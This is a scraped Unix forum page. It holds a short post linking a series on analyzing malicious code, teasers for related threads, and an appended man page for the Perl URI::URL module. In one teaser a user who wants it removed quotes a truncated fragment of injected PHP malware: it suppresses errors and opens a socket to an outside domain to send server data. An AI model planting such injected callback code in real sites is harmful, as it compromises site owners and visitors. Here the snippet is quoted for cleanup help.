08-04-2010
How to analyze malicious code
A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work:
These 2 Users Gave Thanks to pludi For This Post:
8 More Discussions You Might Find Interesting
1. Shell Programming and Scripting
I have a file which contains records in the format of
2006-08-25 12:06:13|ABC|93
2006-08-25 12:45:55|ABC|203
2006-08-25 01:48:19|DEF|156
2006-08-25 01:49:09|ABC|12798
2006-08-25 02:49:59|GHL|4109
2006-08-25 03:50:50|DEF|234
where the format is "arrive time"|"message type"|"processing... (3 Replies)
Discussion started by: mpang_
3 Replies
2. Shell Programming and Scripting
Hello,
Please advise a script/command to remove the following line for a file
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER;
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies
3. Solaris
Hi Gurus,
I have installed the stuff needed for patchdiag for patching, its working okay , however after execution of pathcdiag.sparc i am unable to understand the summury which is produced at the end.
Please help !
Thanks (3 Replies)
Discussion started by: kumarmani
3 Replies
4. Shell Programming and Scripting
Hello
I ask you how to make a
Anti-malicious files and viruses
Or if one of you a small example of the work on the same place and I hope my request
I want a small patch or the process of examination Virus
http://www.google.jo/images/cleardot.gif
---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies
5. Programming
Hi, I have two files:
Input_file1.txt
124
235
152
178
156
142
178
163
159
Input_file2.txt
124|5623
452|6698
178|9995
235|7542
159|8852 (1 Reply)
Discussion started by: cpp_beginner
1 Replies
6. Solaris
Hi,
Is there any tool is available for analyzing Oracle X86 snapshot output.
Thanks in advance. (1 Reply)
Discussion started by: sunnybee
1 Replies
7. Shell Programming and Scripting
Hello,
i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin:
Posting links to pastebin scripts are forbidden at this site.
Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies
8. Debian
Relative newbie to Linux so please be kind and assume I've done little in the way of command line but i have been thrusted into this position.
Here goes. There is a perl script on my box that is using me as a mail server. It is contacting other mail servers to the point of slowing down the box.... (20 Replies)
Discussion started by: dadprpus
20 Replies
LEARN ABOUT DEBIAN
uri::url
URI::URL(3pm) User Contributed Perl Documentation URI::URL(3pm)
NAME
URI::URL - Uniform Resource Locators
SYNOPSIS
$u1 = URI::URL->new($str, $base);
$u2 = $u1->abs;
DESCRIPTION
This module is provided for backwards compatibility with modules that depend on the interface provided by the "URI::URL" class that used to
be distributed with the libwww-perl library.
The following differences exist compared to the "URI" class interface:
o The URI::URL module exports the url() function as an alternate constructor interface.
o The constructor takes an optional $base argument. The "URI::URL" class is a subclass of "URI::WithBase".
o The URI::URL->newlocal class method is the same as URI::file->new_abs.
o URI::URL::strict(1)
o $url->print_on method
o $url->crack method
o $url->full_path: same as ($uri->abs_path || "/")
o $url->netloc: same as $uri->authority
o $url->epath, $url->equery: same as $uri->path, $uri->query
o $url->path and $url->query pass unescaped strings.
o $url->path_components: same as $uri->path_segments (if you don't consider path segment parameters)
o $url->params and $url->eparams methods
o $url->base method. See URI::WithBase.
o $url->abs and $url->rel have an optional $base argument. See URI::WithBase.
o $url->frag: same as $uri->fragment
o $url->keywords: same as $uri->query_keywords
o $url->localpath and friends map to $uri->file.
o $url->address and $url->encoded822addr: same as $uri->to for mailto URI
o $url->groupart method for news URI
o $url->article: same as $uri->message
SEE ALSO
URI, URI::WithBase
COPYRIGHT
Copyright 1998-2000 Gisle Aas.
perl v5.14.2 2012-02-11 URI::URL(3pm)